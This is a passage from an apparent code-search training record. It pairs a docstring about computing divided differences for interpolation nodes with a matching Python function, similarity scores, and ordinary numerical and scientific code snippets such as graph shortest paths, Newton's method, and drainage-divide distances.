and istopTRAIN[i]==1),sum(pTRAIN))\n cost0[iii*Nreps+jjj]=sum(1 for i in range(ntrain) if pTRAIN[i] == 1 and istopTRAIN[i]==0)\n cost1[iii*Nreps+jjj]=sum(1 for i in range(ntrain) if pTRAIN[i] == 0 and istopTRAIN[i]==1)\n \n \"\"\" record precision on test data \"\"\"\n \n pTEST=clf.predict(XTEST)\n precisionTEST[iii*Nreps+jjj]=np.divide(sum(1 for i in range(ntest) if pTEST[i] == 1 and istopTEST[i]==1),sum(pTEST))\n recallTEST[iii*Nreps+jjj]=sum(1 for i in range(ntest) if pTEST[i] == 1 and istopTEST[i]==1)/sum(istopTEST)\n cost0test[iii*Nreps+jjj]=sum(1 for i in range(ntest) if pTEST[i] == 1 and istopTEST[i]==0)\n cost1test[iii*Nreps+jjj]=sum(1 for i in range(ntest) if pTEST[i] == 0 and istopTEST[i]==1)\n \n \"\"\" record positive rate on full data \"\"\"\n \n rate[iii*Nreps+jjj]=(sum(pTRAIN)+sum(pTEST))/(ntrain+ntest)\n \n \"\"\" Compute Pareto front for validation data \"\"\"\n \n Pareto = Lower_Convex_Hull(np.concatenate((cost0.reshape(-1,1),cost1.reshape(-1,1)),1))\n \n \"\"\" make some nice plots for whoever is watching \"\"\"\n \n plt.figure(figsize=(10,5))\n plt.subplot(121)\n plt.plot(cost0,cost1,'.')\n plt.plot(cost0[Pareto],cost1[Pareto],'d')\n plt.xlabel('errors on class zero training data')\n plt.ylabel('errors on class one training data')\n\n plt.subplot(122)\n plt.plot(cost0test,cost1test,'.')\n plt.plot(cost0test[Pareto],cost1test[Pareto],'d')\n plt.xlabel('errors on class zero test data')\n plt.ylabel('errors on class one test data')\n plt.show()\n \n plt.figure(figsize=(15,5))\n plt.subplot(131)\n plt.semilogy(precisionTRAIN,rate,'.')\n plt.semilogy(precisionTRAIN[Pareto],rate[Pareto],'d')\n plt.xlabel('precision on training data')\n plt.ylabel('positive rate')\n\n plt.subplot(132) \n plt.semilogy(precisionTEST,rate,'.')\n plt.semilogy(precisionTEST[Pareto],rate[Pareto],'d')\n plt.xlabel('precision on test data')\n plt.ylabel('positive rate')\n\n plt.subplot(133) \n plt.plot(precisionTEST,recallTEST,'.')\n plt.plot(precisionTEST[Pareto],recallTEST[Pareto],'d')\n plt.xlabel('precision on test data')\n plt.ylabel('recall on test data')\n plt.show() \n \n return {'cost0':cost0,'cost1':cost1,'cost0test':cost0test,'cost1test':cost1test,'precisionTRAIN':precisionTRAIN,'precisionTEST':precisionTEST,'recallTEST':recallTEST,'rate':rate,'Pareto':Pareto}", "def handle_leaf_nodes(self, nodes):\n max_node_id = -1\n for n in nodes:\n n.sum_hess = self.decrypt(n.sum_hess)\n n.sum_grad = self.decrypt(n.sum_grad)\n n.weight = self.splitter.node_weight(n.sum_grad, n.sum_hess)\n n.sitename = self.sitename\n if n.id > max_node_id:\n max_node_id = n.id\n new_nodes = [Node() for i in range(max_node_id + 1)]\n for n in nodes:\n new_nodes[n.id] = n\n return new_nodes", "def label_correcting_algo(dt, ori_node, des_node, do_return=False):\n # Convert all labels to string\n ori = str(ori_node)\n des = str(des_node)\n dt[[\"start\", \"end\"]] = dt[[\"start\", \"end\"]].astype(str) \n \n # Initialization\n nodes = set(dt.loc[:,\"start\"].unique()) | set(dt.loc[:,\"end\"].unique())\n dist = {}.fromkeys(nodes, np.inf)\n dist[ori] = 0\n points = {}.fromkeys(nodes, ori)\n iter_set = {ori}\n \n # Main Algo\n while iter_set:\n i = iter_set.pop() # Randomly pop out a node i\n A_i = dt[dt.start == i]\n for row in A_i.index: \n j = A_i.loc[:, \"end\"][row]\n c_ij = A_i.loc[:, \"cost\"][row]\n if dist[j] > dist[i] + c_ij:\n dist[j] = dist[i] + c_ij\n points[j] = i\n iter_set = iter_set | set([j]) # Union\n \n # Print & Return the Answer\n x = pd.concat([pd.Series(points), pd.Series(dist)], axis=1)\n x.columns = [\"Front-node\", \"Distance\"]\n\n current_node = des\n front_node = \"\"\n sp = des\n while front_node != ori:\n front_node = str(x.loc[current_node, \"Front-node\"])\n sp = \"{} -> {}\".format(front_node, sp)\n current_node = front_node\n \n sp = \"From node {} to node {}, total Distance: {}\\n{}\\n\".format(ori, des, x.loc[des, \"Distance\"], sp)\n if do_return:\n print(sp)\n return x\n else:\n return sp", "def calculate_distance_to_divide(\n grid, longest_path=True, add_to_grid=False, clobber=False\n):\n # check that flow__receiver nodes exists\n if \"flow__receiver_node\" not in grid.at_node:\n raise FieldError(\n \"A 'flow__receiver_node' field is required at the \"\n \"nodes of the input grid.\"\n )\n\n if \"flow__upstream_node_order\" not in grid.at_node:\n raise FieldError(\n \"A 'flow__upstream_node_order' field is required at the \"\n \"nodes of the input grid.\"\n )\n\n if \"drainage_area\" not in grid.at_node:\n raise FieldError(\n \"A 'flow__upstream_node_order' field is required at the \"\n \"nodes of the input grid.\"\n )\n\n # get the reciever nodes, depending on if this is to-one, or to-multiple,\n # we'll need to get a different at-node field.\n if grid.at_node[\"flow__receiver_node\"].size != grid.size(\"node\"):\n to_one = False\n else:\n to_one = True\n\n flow__receiver_node = grid.at_node[\"flow__receiver_node\"]\n drainage_area = grid.at_node[\"drainage_area\"]\n\n # get the upstream node order\n flow__upstream_node_order = grid.at_node[\"flow__upstream_node_order\"]\n\n # get downstream flow link lengths, result depends on type of grid.\n if isinstance(grid, RasterModelGrid):\n flow_link_lengths = grid.length_of_d8[\n grid.at_node[\"flow__link_to_receiver_node\"]\n ]\n else:\n flow_link_lengths = grid.length_of_link[\n grid.at_node[\"flow__link_to_receiver_node\"]\n ]\n\n # create an array that representes the distance to the divide.\n distance_to_divide = np.zeros(grid.nodes.size)\n\n if not longest_path:\n distance_to_divide[:] = 2 * grid.size(\"node\") * np.max(flow_link_lengths)\n\n # iterate through the flow__upstream_node_order backwards.\n for node in reversed(flow__upstream_node_order):\n # if drainage are is equal to node cell area, set distance to zeros\n # this should handle the drainage divide cells as boundary cells have\n # their area set to zero.\n if drainage_area[node] == grid.cell_area_at_node[node]:\n distance_to_divide[node] = 0\n\n # get flow recievers\n reciever = flow__receiver_node[node]\n\n if to_one:\n # if not processing an outlet node.\n if reciever != node:\n if longest_path:\n cond = (\n distance_to_divide[reciever]\n < distance_to_divide[node] + flow_link_lengths[node]\n )\n else:\n cond = (\n distance_to_divide[reciever]\n > distance_to_divide[node] + flow_link_lengths[node]\n )\n\n if cond:\n distance_to_divide[reciever] = (\n distance_to_divide[node] + flow_link_lengths[node]\n )\n\n else:\n # non-existant links are coded with -1\n useable_receivers = np.where(reciever != grid.BAD_INDEX)[0]\n\n for idx in range(len(useable_receivers)):\n r = reciever[useable_receivers][idx]\n fll = flow_link_lengths[node][useable_receivers][idx]\n\n # if not processing an outlet node.\n if r != node:\n if longest_path:\n cond = distance_to_divide[r] < distance_to_divide[node] + fll\n else:\n cond = distance_to_divide[r] > distance_to_divide[node] + fll\n\n if cond:\n distance_to_divide[r] = distance_to_divide[node] + fll\n\n # store on the grid\n if add_to_grid:\n grid.add_field(\n \"distance_to_divide\", distance_to_divide, at=\"node\", clobber=clobber\n )\n\n return distance_to_divide", "def newtonsMethod(f, df, ddf, x, niter=10):\n\n points = []\n\n for i in xrange(niter):\n point = np.dot(-la.inv(ddf(x)), (df(x)))\n\n slope = np.dot(df(x), point)\n\n a = backtracking(f, slope, x, point)\n \n #update point\n x_k = x + a*point\n points.append(x_k)\n x = x_k\n\n return points" ]
[ "0.65839136", "0.57315016", "0.567347", "0.55890775", "0.55738044", "0.5463602", "0.54403263", "0.5439998", "0.5405277", "0.53822875", "0.5344752", "0.5334331", "0.5325484", "0.5318365", "0.53122985", "0.53017414", "0.5295547", "0.5275849", "0.52737594", "0.52574426", "0.5230346", "0.52266407", "0.5218263", "0.5185318", "0.51770127", "0.5173949", "0.5160851", "0.5157591", "0.51378775", "0.5133119", "0.51289505", "0.5125523", "0.5108133", "0.51064736", "0.5104259", "0.5103502", "0.5081732", "0.5076288", "0.5071857", "0.50684774", "0.5065425", "0.50579035", "0.50561845", "0.5056071", "0.5039873", "0.50350887", "0.503006", "0.5029164", "0.50276995", "0.50238025", "0.50192326", "0.50077516", "0.50068814", "0.49979854", "0.49950433", "0.49872214", "0.4986004", "0.49854264", "0.4978293", "0.4977638", "0.49750566", "0.49637634", "0.49631697", "0.49588704", "0.4954976", "0.4951387", "0.4945267", "0.49444473", "0.49434066", "0.4940878", "0.49375913", "0.49338678", "0.49338412", "0.4928129", "0.49236566", "0.49182633", "0.49153966", "0.49121758", "0.49117246", "0.49077004", "0.4906052", "0.49051553", "0.49036717", "0.49035296", "0.48919111", "0.4884319", "0.4883693", "0.4875527", "0.48731244", "0.4872033", "0.4870849", "0.48670393", "0.4865498", "0.48618716", "0.48583892", "0.48449036", "0.48444298", "0.4838655", "0.48371902", "0.48324525" ]
0.6325345
1
Calculates divided differences for given interpolation nodes. It is assumed, that at least two interpolation nodes are provided. Each tuple of returned list represents one level of divided differences tree.
def calculate_divided_differences(nodes): nodes_to_compute = [] divided_differences = [] for node in nodes: nodes_to_compute.append(DividedDifferenceNode(x=node[0], divided_difference=node[1])) divided_differences.append(tuple(nodes_to_compute)) while len(nodes_to_compute) > 1: next_node_row = calculate_divided_differences_row(nodes_to_compute) divided_differences.append(tuple(next_node_row)) nodes_to_compute = next_node_row return divided_differences
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def calculate_divided_differences_row(nodes_to_compute):\n divided_differences = []\n\n if len(nodes_to_compute) == 1:\n return None\n\n for i in range(0, len(nodes_to_compute) - 1):\n child = DividedDifferenceNode.create_child_node(nodes_to_compute[i], nodes_to_compute[i + 1])\n child.calculate_value()\n divided_differences.append(child)\n\n for node in divided_differences:\n print(node, end='')\n\n print('\\n')\n return divided_differences", "def diff(self):\n return [node.diff for node in self]", "def test_frac_diffNonGaps(self):\n s1 = self.RNA(\"AAAA\")\n s2 = self.RNA(\"AGGG\")\n s3 = self.RNA(\"GGGG\")\n s4 = self.RNA(\"AG--GA-G\")\n s5 = self.RNA(\"CU--CU-C\")\n s6 = self.RNA(\"AC--GC-G\")\n s7 = self.RNA(\"--------\")\n s8 = self.RNA(\"AAAA----\")\n s9 = self.RNA(\"A-GG-A-C\")\n e = self.RNA(\"\")\n\n def test(x, y, z):\n return self.assertFloatEqual(x.frac_diff_non_gaps(y), z)\n\n test(s1, s2, 0.75)\n test(s1, s3, 1)\n test(s2, s3, 0.25)\n test(s1, s4, 0.5)\n test(s4, s5, 1)\n test(s4, s6, 0.4)\n test(s4, s7, 0)\n test(s4, s8, 0.5)\n test(s4, s9, 1 / 3.0)\n test(e, s4, 0)", "def getSubdivisionNodes(self, signature):\n x, y, z = signature[0], signature[1], signature[2]\n return [(2*x+1, 2*y, 2*z), (2*x, 2*y, 2*z),\n (2*x+1, 2*y+1, 2*z), (2*x, 2*y, 2*z+1),\n (2*x+1, 2*y+1, 2*z+1), (2*x, 2*y+1, 2*z),\n (2*x+1, 2*y, 2*z+1), (2*x, 2*y+1, 2*z+1)]", "def fractionalPoints(totalNodeList, recNodeList, fracPoints):\n\n avPoint = averagePoints(recNodeList)\n\n for i in range(0, fracPoints):\n closestPoint = closest_node(avPoint, totalNodeList) #Finds closest point\n totalNodeList.remove(closestPoint)\n recNodeList.append(closestPoint)\n\n printProgressBar(i, fracPoints) \n\n return recNodeList", "def equiangular_dimension_unpack(nodes, ratio):\n dim1 = int((nodes / ratio) ** 0.5)\n dim2 = int((nodes * ratio) ** 0.5)\n if dim1 * dim2 != nodes: # Try to correct dim1 or dim2 if ratio is wrong\n if nodes % dim1 == 0:\n dim2 = nodes // dim1\n if nodes % dim2 == 0:\n dim1 = nodes // dim2\n assert dim1 * dim2 == nodes, f'Unable to unpack nodes: {nodes}, ratio: {ratio}'\n return dim1, dim2", "def getFractionalItems(self, startingPoint, returnFmt = 0, refinements = 1):\n\n def closest_node(node, nodes):\n\n \"\"\" returns closest node using dot vectorization, slightly faster see https://codereview.stackexchange.com/questions/28207/finding-the-closest-point-to-a-list-of-points \"\"\"\n\n if node in nodes:\n nodes.remove(node)\n\n nodes = np.asarray(nodes)\n deltas = nodes - node\n dist_2 = np.einsum('ij,ij->i', deltas, deltas)\n temp = nodes[np.argmin(dist_2)]\n return (temp[0], temp[1])\n\n def averagePoints(nodeList):\n #Consider switching to numpy mean arrays if performance is an issue\n #inits\n tempX, tempY = 0, 0\n for node in nodeList:\n tempX += node[0]\n tempY += node[1]\n \n avX, avY = tempX/len(nodeList), tempY/len(nodeList)\n avPoint = [avX, avY]\n\n return avPoint\n\n def fractionalPoints(totalNodeList, recNodeList, fracPoints):\n\n \"\"\" Starts out with one point should be in a place of high density #NOTE this is not automated yet. Keep adding points (it will add the closest)\n point to the set over and over until 50% of the points are encircled. Then it will return a list of those points \"\"\"\n\n avPoint = averagePoints(recNodeList)\n\n for i in range(0, fracPoints):\n closestPoint = closest_node(avPoint, totalNodeList) #Finds closest point\n totalNodeList.remove(closestPoint)\n recNodeList.append(closestPoint)\n\n printProgressBar(i, fracPoints) \n\n return recNodeList \n\n #Gets fractional points \n numPointsFrac = math.floor(self.numPoints * self.detectionFraction)\n fracPoints = fractionalPoints(self.points, [startingPoint], numPointsFrac)\n \n #Hull creation and getting of verticies\n hull = ConvexHull(fracPoints)\n polyVertices = [fracPoints[vertex] for vertex in hull.vertices] \n cutVertices = chaikins_corner_cutting(polyVertices, refinements)\n\n #Path creation \n polyCodes = [mppath.Path.LINETO] * len(polyVertices)\n polyCodes[0] = mppath.Path.MOVETO\n polyCodes[-1] = mppath.Path.CLOSEPOLY\n\n cutCodes = [mppath.Path.LINETO] * len(cutVertices)\n cutCodes[0] = mppath.Path.MOVETO\n cutCodes[-1] = mppath.Path.CLOSEPOLY\n\n polyPath = mppath.Path(polyVertices, polyCodes)\n cutPath = mppath.Path(cutVertices, cutCodes)\n\n #How you want the information returned \n if returnFmt == -2:\n return [[cutVertices, cutPath], fracPoints]\n if returnFmt == -1:\n return fracPoints\n if returnFmt == 0:\n return [cutVertices, cutPath]\n if returnFmt == 1:\n return [polyVertices, polyPath]\n if returnFmt == 2:\n return [[cutVertices, cutPath], [polyVertices, polyPath]]", "def _computeDerivative(self,angles, distances):\n slope=[]\n slope.append(0)\n for i in xrange(1,len(angles)):\n der = (distances[i]-distances[i-1])/(angles[i]-angles[i-1])\n slope.append(der)\n #slope.append(0)\n return slope", "def diff_frac(data_1, data_2):\n\n frac_1 = np.sum(data_1) / len(data_1)\n frac_2 = np.sum(data_2) / len(data_2)\n\n return frac_1 - frac_2", "def _compute_diff(self, begin, end):\n d = self.diff\n x = self.x\n for i in range(begin, end):\n for j in range(i):\n d[i].append((d[i][j] - d[i-1][j]) / (x[i] - x[i-j-1]))", "def rat2frac_list(x, y):\n\tcont = rat2cont_quot(x, y)\n\tfrac = []\n\tfor i in range(len(cont)):\n\t\tfrac.append(cont2frac(cont[:(i+1)]))\n\treturn frac", "def differences(data: list) -> list:\n differences = []\n iterable, copy = tee(data)\n next(copy) # adjusts copy of my iterable up 1 element\n for x, y in zip(iterable, copy):\n differences.append(abs(x - y))\n\n return differences", "def test_frac_diffGaps(self):\n s1 = self.RNA(\"AAAA\")\n s2 = self.RNA(\"GGGG\")\n s3 = self.RNA(\"----\")\n s4 = self.RNA(\"A-A-\")\n s5 = self.RNA(\"-G-G\")\n s6 = self.RNA(\"UU--\")\n s7 = self.RNA(\"-\")\n s8 = self.RNA(\"GGG\")\n e = self.RNA(\"\")\n self.assertEqual(s1.frac_diff_gaps(s1), 0)\n self.assertEqual(s1.frac_diff_gaps(s2), 0)\n self.assertEqual(s1.frac_diff_gaps(s3), 1)\n self.assertEqual(s1.frac_diff_gaps(s4), 0.5)\n self.assertEqual(s1.frac_diff_gaps(s5), 0.5)\n self.assertEqual(s1.frac_diff_gaps(s6), 0.5)\n self.assertEqual(s1.frac_diff_gaps(s7), 1)\n self.assertEqual(s1.frac_diff_gaps(e), 0)\n self.assertEqual(s3.frac_diff_gaps(s3), 0)\n self.assertEqual(s3.frac_diff_gaps(s4), 0.5)\n self.assertEqual(s3.frac_diff_gaps(s7), 0.0)\n self.assertEqual(e.frac_diff_gaps(e), 0.0)\n self.assertEqual(s4.frac_diff_gaps(s5), 1.0)\n self.assertEqual(s4.frac_diff_gaps(s6), 0.5)\n self.assertFloatEqual(s6.frac_diff_gaps(s8), 1 / 3.0)", "def test_frac_diff(self):\n s1 = self.RNA(\"ACGU\")\n s2 = self.RNA(\"AACG\")\n s3 = self.RNA(\"GG\")\n s4 = self.RNA(\"A\")\n e = self.RNA(\"\")\n self.assertEqual(s1.frac_diff(e), 0)\n self.assertEqual(s1.frac_diff(s2), 0.75)\n self.assertEqual(s1.frac_diff(s3), 1)\n self.assertEqual(s1.frac_diff(s4), 0) # note truncation", "def diff(self, value):\n if hasattr(value, \"__len__\"):\n if len(value) == len(self):\n for node, val in zip(self, value):\n node.diff = val\n return\n else:\n raise RxDException(\n \"diff must either be a scalar or an iterable of the same length as the NodeList\"\n )\n for node in self:\n node.diff = value", "def deltas(L):\n return map(sub, tuple(L)[1:], L)", "def __diff_internal(self):\n assert self.p > 0, \"order of Bspline must be > 0\" # we already handle the other case in diff()\n\n # https://www.cs.mtu.edu/~shene/COURSES/cs3621/NOTES/spline/B-spline/bspline-derv.html\n #\n t = self.knot_vector\n p = self.p\n bi = BsplineBasis(t[:-1], p - 1)\n bip1 = BsplineBasis(t[1:], p - 1)\n\n numer1 = +p\n numer2 = -p\n denom1 = t[p:-1] - t[:-(p + 1)]\n denom2 = t[(p + 1):] - t[1:-p]\n\n with np.errstate(divide='ignore', invalid='ignore'):\n ci = np.where(denom1 != 0., (numer1 / denom1), 0.)\n cip1 = np.where(denom2 != 0., (numer2 / denom2), 0.)\n\n return (ci, bi), (cip1, bip1)", "def find_fractions():\n num_list = []\n den_list = []\n for n in range(10, 100):\n for d in range(10, 100):\n if d > n:\n x = n / d\n ln = list(str(n))\n ld = list(str(d))\n if (ln[0] == ld[1]) and (ln[0] != '0'):\n if ld[0] != '0':\n if (int(ln[1]) / int(ld[0])) == x:\n print \"n/d =\", n, d\n num_list.append(n)\n den_list.append(d)\n else:\n continue\n elif (ln[1] == ld[0]) and (ln[1] != '0'):\n if ld[1] != '0':\n if (int(ln[0]) / int(ld[1])) == x:\n print \"n/d =\", n, d\n num_list.append(n)\n den_list.append(d)\n else:\n continue\n else:\n continue\n return num_list, den_list", "def diff(self):\n\t\tif len(self.v) < 4:\n\t\t\treturn None\n\t\tif self.poli == None:\n\t\t\tself.generar_polinomio()\n\t\tif x != None:\n\t\t\treturn diff(self.poli)(x)\n\t\treturn diff(self.poli)", "def _extract_fraction_with_text_nl(tokens, short_scale, ordinals):\n for c in _FRACTION_MARKER_NL:\n partitions = partition_list(tokens, lambda t: t.word == c)\n\n if len(partitions) == 3:\n numbers1 = \\\n _extract_numbers_with_text_nl(partitions[0], short_scale,\n ordinals, fractional_numbers=False)\n numbers2 = \\\n _extract_numbers_with_text_nl(partitions[2], short_scale,\n ordinals, fractional_numbers=True)\n\n if not numbers1 or not numbers2:\n return None, None\n\n # ensure first is not a fraction and second is a fraction\n num1 = numbers1[-1]\n num2 = numbers2[0]\n if num1.value >= 1 and 0 < num2.value < 1:\n return num1.value + num2.value, \\\n num1.tokens + partitions[1] + num2.tokens\n\n return None, None", "def calculate_deltas(tvals, tp_confidences, fp_confidences, num_samples):\n deltas = []\n tp_percentages = []\n fp_percentages = []\n for tval in tvals:\n dval, tp_pct, fp_pct = delta(\n tval,\n tp_confidences,\n fp_confidences,\n num_samples\n )\n deltas.append(dval)\n tp_percentages.append(tp_pct)\n fp_percentages.append(fp_pct)\n return deltas, tp_percentages, fp_percentages", "def divide_microstructure_unit(self,point1,point2,dimensions):\n\t\tnew_sections = []\n\t\tif len(point1) < 4:\n\t\t\tdone = 0.0\n\t\t\tdtwo = 0.0\n\t\telse:\n\t\t\tdone = point1[-1]\n\t\t\tdtwo = point2[-1]\n\t\t\n\t\tp1 = np.array(point1[:3])\n\t\tp2 = np.array(point2[:3])\n\t\tvec = p2-p1\n\t\tdimslength = float(np.sum(dimensions))\n\t\tfor d,dim in enumerate(dimensions[:-1]):\n\t\t\tnearsideproportion = np.sum(dimensions[:d])/dimslength\n\t\t\tfarsideproportion = np.sum(dimensions[:d+1])/dimslength\n\t\t\tnew_sections.append([\t\n\t\t\t\t\t\tlist(np.append(p1+vec*nearsideproportion,done)),\n\t\t\t\t\t\tlist(np.append(((p1+vec*nearsideproportion)+(p1+vec*farsideproportion))/2.0,(done+dtwo)/2.0)),\n\t\t\t\t\t\tlist(np.append(p1+vec*farsideproportion,dtwo))\n\t\t\t\t\t\t])\n\t\t\n\t\tnew_sections.append([\t\n\t\t\t\t\tlist(new_sections[-1][-1]),\n\t\t\t\t\tlist((np.array(new_sections[-1][-1])+np.array(list(point2[:3])+[dtwo]))/2.0),\n\t\t\t\t\tlist(point2[:3])+[dtwo]\n\t\t\t\t\t])\n\t\t\n\t\tif len(dimensions) > 2:\n\t\t\treturn(new_sections,['node','paranode1','paranode2','internode','paranode2','paranode1'][:len(new_sections)])\n\t\t\n\t\telse:\n\t\t\treturn(new_sections,['interbouton','bouton'][:len(new_sections)])", "def find_sharpest_fork_general(Nodes):\n pair_list = []\n Dis = np.array([])\n for n in Nodes:\n if n.parent is not None:\n if n.parent.parent is not None:\n a = n.parent.children\n if(isinstance(a, list)):\n if(len(a)==2):\n n1 = a[0]\n n2 = a[1]\n pair_list.append([n1 , n2])\n dis = LA.norm(a[0].xyz - a[1].xyz,2)\n Dis = np.append(Dis,dis)\n if(len(Dis)!= 0):\n (b,) = np.where(Dis == Dis.min())\n sharpest_pair = pair_list[b[0]]\n distance = Dis.min()\n else:\n sharpest_pair = [0,0]\n distance = 0.\n return sharpest_pair, distance", "def divideWork(self,ratios):\r\n \r\n taskCount = 0\r\n\r\n #Sums up the ratio amounts\r\n for nodeId,ratio in ratios.iteritems():\r\n taskCount += ratio\r\n\r\n #Divide the work into 'taskCount' chunks\r\n [primer,prefix] = WorkRange(self.charset).divideMore(self.primer,self.prefix,taskCount)\r\n \r\n prim = {}\r\n pref = {}\r\n \r\n for nodeId,ratio in ratios.iteritems():\r\n prim[nodeId] = []\r\n pref[nodeId] = []\r\n\r\n #Assigns each node 'ratio' amount chunks\r\n for i in range(ratio):\r\n prim[nodeId].append(primer.pop())\r\n pref[nodeId].append(prefix.pop())\r\n\r\n\r\n return [prim,pref]", "def derivative(requestContext, seriesList):\n results = []\n for series in seriesList:\n newValues = []\n prev = None\n for val in series:\n if None in (prev,val):\n newValues.append(None)\n prev = val\n continue\n newValues.append(val - prev)\n prev = val\n newName = \"derivative(%s)\" % series.name\n newSeries = TimeSeries(newName, series.start, series.end, series.step, newValues)\n newSeries.pathExpression = newName\n results.append(newSeries)\n return results", "def diff_op(self, args: List[float], time: float) -> List[float]:\n v, nK, ca = args\n ca_args: List[float] = [v, ca]\n dvdt: float = self.dvdt(args=args)\n dnKdt: float = self.kvhh.dndt(v=v, n=nK)\n dCadt: float = self.dCadt(args=ca_args)\n return [dvdt, dnKdt, dCadt]", "def split_distances(self, remaining: List[int], distances: List[float], mid: int) -> List[List[int]]:\n closer, farther = [], []\n for index in remaining:\n if distances[index] <= mid:\n closer.append(index)\n else:\n farther.append(index)\n return [closer, farther]", "def calc_diffs(self, y, x, locs):\n res = {}\n \n for item, value in locs.iteritems():\n res[item] = self.slab_ratio * (self.grid[y, x] - self.grid[value['y'], value['x']])\n \n return res", "def test_compare_old_to_new_method_to_create_trees(self):\n nodes = util.generate_sequence_of_points(2, 2)\n tree1 = kdtree.createNewTree(nodes)\n kdtree.visualize(tree1)\n \n sel_axis = (lambda axis: axis)\n tree2 = kdtree.createNewTree([[0.5, 0.5]],axis = 0, sel_axis= sel_axis)\n tree2.split2([0.25, 0.5], axis = 1)\n tree2.split2([0.75, 0.5], axis = 1)\n \n #left\n tree2.split2([0.25, 0.25], axis = 0, sel_axis = sel_axis)\n tree2.split2([0.25, 0.75], axis = 0, sel_axis = sel_axis)\n \n #right\n tree2.split2([0.75, 0.25], axis = 0, sel_axis = sel_axis)\n tree2.split2([0.75, 0.75], axis = 0, sel_axis = sel_axis)\n \n kdtree.visualize(tree2)\n \n for n in zip(kdtree.level_order(tree1), kdtree.level_order(tree2)):\n self.assertEqual(n[0].data, n[1].data, \"elements not equal\")\n \n if n[0].data is not None and n[1].data is not None:\n self.assertEqual(n[0].axis, n[1].axis, \"elements not equal\")", "def compareNodes(x, y):\n return x.pathValue - y.pathValue", "def getNodesAndDistances():\n\n\tglobal width, height\n\n\t# First we generate the list\n\n\tprint \"\\tGetting node list...\"\n\t\n\tnodeDict = {}\n\n\tfor y in range(height):\n\t\tfor x in range(width):\n\t\t\ttheType = getSquare(x, y)\n\n\t\t\tprint \"\\t\\tGetting list for node (%d, %d) of type %d...\" % (x, y, theType)\n\n\t\t\ttempList = getNodeList(x, y, theType)\n\n\t\t\tif tempList == []:\n\t\t\t\tprint \"\\t\\t\\tNo nodes here.\"\n\t\t\telse:\n\t\t\t\tfor i in range(len(tempList)):\n\t\t\t\t\tnode = tempList[i]\n\t\t\t\t\tnodeName = node[0]\n\t\t\t\t\tnodeDict[nodeName] = node[1:]\t# Everything but the first element\n\t\t\t\t\tprint \"\\t\\t\\tAdded node '%s'...\" % nodeName\n\n\tprint \"\\tDone getting node list (%d nodes)...\" % (len(nodeDict.keys()))\n\tprint \"\"\n\n\t# Now that we've got that, we get a list of pairs\n\n\tpairList = getPairList(nodeDict)\n\n\t# Now we calculate the distance between every pair of nodes that connect\n\n\tprint \"\"\n\tprint \"\\tCreateing dictionary of distances between connected nodes...\"\n\n\tdistanceDict = {}\n\n\tfor tuple in pairList:\n\t\t(nodeA, nodeB) = tuple\n\t\tprint \"\\t\\tCalculating distance between '%s' and '%s'...\" % (nodeA, nodeB)\n\t\tdistance = distanceBetween(nodeA, nodeB, nodeDict)\n\t\tpairName = \"%s%s\" % (nodeA, nodeB)\n\t\tdistanceDict[pairName] = distance\n\t\tprint \"\\t\\t\\tDistace was %f.\" % (distance)\n\n\tprint \"\\tDone creating dictionary of node differences (%d pairs).\" % (len(distanceDict.keys()))\n\n\treturn nodeDict, distanceDict", "def _compare_elements(self, old, new):\n res = None\n # We want to go through the tree post-order\n if isinstance(old, dict):\n res_dict = self.compare_dicts(old, new)\n if (len(res_dict) > 0):\n res = res_dict\n # Now we are on the same level\n # different types, new value is new\n elif (type(old) != type(new)):\n res = {'---': old, '+++': new}\n # recursive arrays\n # we can be sure now, that both new and old are\n # of the same type\n elif (isinstance(old, list)):\n res_arr = self._compare_arrays(old, new)\n if (len(res_arr) > 0):\n res = res_arr\n # the only thing remaining are scalars\n else:\n scalar_diff = self._compare_scalars(old, new)\n if scalar_diff is not None:\n res = scalar_diff\n\n return res", "def find_sharpest_fork(nodes):\n pair_list = []\n Dis = np.array([])\n for n in nodes:\n if n.parent is not None:\n if n.parent.parent is not None:\n a = n.parent.children\n if(isinstance(a, list)):\n if(len(a)==2):\n n1 = a[0]\n n2 = a[1]\n if(len(n1.children) == 0 and len(n2.children) == 0):\n pair_list.append([n1 , n2])\n dis = LA.norm(a[0].xyz - a[1].xyz,2)\n Dis = np.append(Dis,dis)\n if(len(Dis)!= 0):\n (b,) = np.where(Dis == Dis.min())\n sharpest_pair = pair_list[b[0]]\n distance = Dis.min()\n else:\n sharpest_pair = [0,0]\n distance = 0.\n return sharpest_pair, distance", "def calculate_distance_to_divide(\n grid, longest_path=True, add_to_grid=False, clobber=False\n):\n # check that flow__receiver nodes exists\n if \"flow__receiver_node\" not in grid.at_node:\n raise FieldError(\n \"A 'flow__receiver_node' field is required at the \"\n \"nodes of the input grid.\"\n )\n\n if \"flow__upstream_node_order\" not in grid.at_node:\n raise FieldError(\n \"A 'flow__upstream_node_order' field is required at the \"\n \"nodes of the input grid.\"\n )\n\n if \"drainage_area\" not in grid.at_node:\n raise FieldError(\n \"A 'flow__upstream_node_order' field is required at the \"\n \"nodes of the input grid.\"\n )\n\n # get the reciever nodes, depending on if this is to-one, or to-multiple,\n # we'll need to get a different at-node field.\n if grid.at_node[\"flow__receiver_node\"].size != grid.size(\"node\"):\n to_one = False\n else:\n to_one = True\n\n flow__receiver_node = grid.at_node[\"flow__receiver_node\"]\n drainage_area = grid.at_node[\"drainage_area\"]\n\n # get the upstream node order\n flow__upstream_node_order = grid.at_node[\"flow__upstream_node_order\"]\n\n # get downstream flow link lengths, result depends on type of grid.\n if isinstance(grid, RasterModelGrid):\n flow_link_lengths = grid.length_of_d8[\n grid.at_node[\"flow__link_to_receiver_node\"]\n ]\n else:\n flow_link_lengths = grid.length_of_link[\n grid.at_node[\"flow__link_to_receiver_node\"]\n ]\n\n # create an array that representes the distance to the divide.\n distance_to_divide = np.zeros(grid.nodes.size)\n\n if not longest_path:\n distance_to_divide[:] = 2 * grid.size(\"node\") * np.max(flow_link_lengths)\n\n # iterate through the flow__upstream_node_order backwards.\n for node in reversed(flow__upstream_node_order):\n # if drainage are is equal to node cell area, set distance to zeros\n # this should handle the drainage divide cells as boundary cells have\n # their area set to zero.\n if drainage_area[node] == grid.cell_area_at_node[node]:\n distance_to_divide[node] = 0\n\n # get flow recievers\n reciever = flow__receiver_node[node]\n\n if to_one:\n # if not processing an outlet node.\n if reciever != node:\n if longest_path:\n cond = (\n distance_to_divide[reciever]\n < distance_to_divide[node] + flow_link_lengths[node]\n )\n else:\n cond = (\n distance_to_divide[reciever]\n > distance_to_divide[node] + flow_link_lengths[node]\n )\n\n if cond:\n distance_to_divide[reciever] = (\n distance_to_divide[node] + 